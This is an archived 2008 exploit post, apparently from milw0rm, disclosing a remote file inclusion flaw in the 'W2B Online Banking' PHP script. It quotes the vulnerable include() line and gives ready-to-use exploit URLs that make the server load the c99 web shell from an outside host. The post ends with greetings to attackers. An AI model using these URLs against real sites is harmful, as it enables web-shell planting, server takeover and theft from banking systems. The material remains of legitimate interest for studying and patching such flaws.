remote file include

win32 . exe Tue, 15 Apr 2008 13:41:58 -0700

#########################################################################

        W2B Online Banking Remote File Inclusion Vulnerability


#########################################################################



## AUTHOR: THuM4N

## Email : [EMAIL PROTECTED]


## Script : W2B Online Banking 


## Site   : http://www.w2b.ru


## Vulnerable CODE :

~~~~~~~~~~/index.php ~~~~~~~~~~~~~~~~~~~~~~

{

    include($_SESSION["ilang"]."/".$_REQUEST["page"].".htm");

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



## EXPLOIT :

http://[HOST]/[Path]/index.php?ilang=http://yoursite.com/c99.txt?

 

 or


http://[HOST]/?ilang=http://yoursite.com/c99.txt?



## SPECIAL GREETZ : 2 All MUSLIM HACKERS.

## AND BIGUP 2 All Attackers Around The World .


#########################################################################

      W2B Online Banking Remote File Inclusion Vulnerability

#########################################################################


# milw0rm.com [2008-04-15]

remote file include

Reply via email to